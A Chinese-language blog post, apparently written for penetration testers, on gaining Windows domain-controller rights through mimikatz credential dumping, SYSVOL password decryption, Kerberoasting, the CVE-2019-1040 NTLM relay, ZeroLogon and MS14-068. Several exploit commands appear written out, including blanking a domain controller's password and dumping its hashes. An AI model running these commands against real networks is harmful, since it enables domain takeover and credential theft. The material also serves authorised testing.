获取域控权限
获取域控权限
获取域控权限的方法
在域渗透中、作为渗透测试人员,获取域控的权限基本上可以获取整个内网的权限
1.高权限读取本地密码
当域管理员在域成员机器上登录进行工作的时候,会将明文密码保存在本地进行的lsass.exe,可以通过mimikatz来读取到本地的明文密码。
如果主机存在杀软的时候,上传mimikatz很多时候都会被杀掉,可以通过procdump+mimikatz的方式进行绕过。先导出lsass.exe
保存到本地,通过mimikatz读lsass.dmp的明文
如果目标机器是windows server 2012,通过添加注册表,在通过锁屏,让管理员重新登录及可以读取明文。
添加注册表,设置UseLogonCredential设置为1
利用powershell脚本进行锁屏
管理员重新登录后就可以抓取到明文密码了。
2.SYSVOL组策略获取密码
在域环境中,有个默认的共享路径
SYSVOL是活动目录存储文件服务副本的共享文件夹,里面包含有登录脚本,组策略数据等,域里的所有用户都能访问这个共享文件。在SYSVOL目录下,默认是没有groups.xml文件的,必须创建组策略脚本登录才有这个文件。在groups.xml文件中,密码是通过AES-256加密的,但是微软发布了AES的私钥。
可以利用powershell解密密文:
针对SYSOVL的防御:
3.Kerberoasting
SPN为服务主体名称,是服务实列(MSSQL,HTTP等)的唯一标识,如果在林中安装服务的多个实列,每个实列都有自己的SPN,如果kerberos服务票证的加密类型为RC4_HMAC_MD5,就可以导出TGS对其进行离线破解,获取到域用户的密码了。
使用setspn查询spn(windows7和server2008默认自带)
查询域内所有的SPN和查询test域的SPN
以CN开头的为代表一个账号,机器账号为Computers,域用户账号为Users
查询域内注册的spn(kerberoast)
PowerView
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
给MSSQL服务注册SPN
将kerberos的加密方式换成RC4_HMAC_MD5
方法1.用mimikatz 脚本穷举
请求指定的TGS,完成之后klist就能查看相应的票据
mimikatz导出票据
使用tgsrepcrack.py破解
如果是域控用户注册的 可以得到域得明文密码
方法2 使用hashcat穷举
使用System.IdentityModel.Tokens.KerberosRequestorSecurityToken
请求TGS,在返回结果中提取出TGS,输出的TGS可选择John the Ripper或Hashcat进行破解。
实例演示:
在域内一台主机上以普通用户权限执行:
输出结果如下图:
保存文件 使用hashcat对其穷举
密码 pass@123
4.内网协议NTLM之内网大杀器CVE-2019-1040漏洞
创建机器主机账号
中继&委派
执行ntlmrelayx.py脚本进行NTLM中继攻击,设置SMB服务器并将认证凭据中继到LDAP协议。其中–remove-mic选项用于清除MIC标志,–escalate-user用于提升指定用户权限
域控有两台域控 10.10.10.142 主控 10.10.10.140是备份域控 10.10.10.139 是中继机子(kali)
python3 printerbug.py redteam.club/hack:pass@123@10.10.10.140 10.10.10.139
监听提升 修改委派
获取服务票据
导出域控哈希
5.CVE-2020-1472-ZeroLogon
简介
Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远程接口也使用了该函数,导致可以将域控中保存在AD中的管理员password设置为空
影响版本
使用zerologin脚本复现
复现过程
漏洞利用
下载exp: git clone https://github.com/dirkjanm/CVE-2020-1472
置空DC的密码 python3 cve-2020-1472-exploit.py DC_NETBIOS_NAME DC_IP_ADDR
获取HASH
使用impacket包中的secretsdum.py来获取相关的HASh
python3 secretsdump.py DOMAIN/DC_NETBIOS_NAME$@DC_IP_ADDR -no-pass
获取shell
获取HASH后,可以利用wmiexec.py登录,从而获取一个SHELL
恢复原HASH
执行以下命令,获取SAM中原来的HASH
检测域密码
6.MS14-068漏洞进行提权
server2008有效 MS14068是一个能够使普通用户提权到域控权限的权限提升漏洞。攻击者可以通过构造特定的请求包来达到提升权限的目的。
第一步:利用MS14-068伪造生成TGT
第二步:利用mimikatz将工具得到的TGT票据写入内存,创建缓存证书
第三步:获取域管理员权限。创建一个 test 账号并加入域管理员组,从而随时可以登录域控主机进行操作。
7.窃取域管理员令牌
当有域控账户登陆至服务器时可使用令牌模拟进行渗透取得域控权限。
1、入侵域管理员所在的服务器,窃取域管理员的令牌,从而控制整个域。
2、直接在meterpreter shell
上执行添加域管理员
8.进程迁移
入侵了域管理员所登录的服务器,将进程迁移到域管理员所运行的进程,就可以获得域管理员权限。
1、获取域管理员列表
2、利用ps找到域管理员(TEST\bypass)所运行的进程,然后将shell进程迁移到域管理员所运行的进程中,成功后就获得了域管理员权限。如下图所示:
3、输入shell命令获取OS shell,在本机上使用Windows命令添加新的域管理员:
__EOF__

本文链接:https://www.cnblogs.com/rayob1/p/16821390.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力!
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· ollama系列01:轻松3步本地部署deepseek,普通电脑可用
· 25岁的心里话
· 按钮权限的设计及实现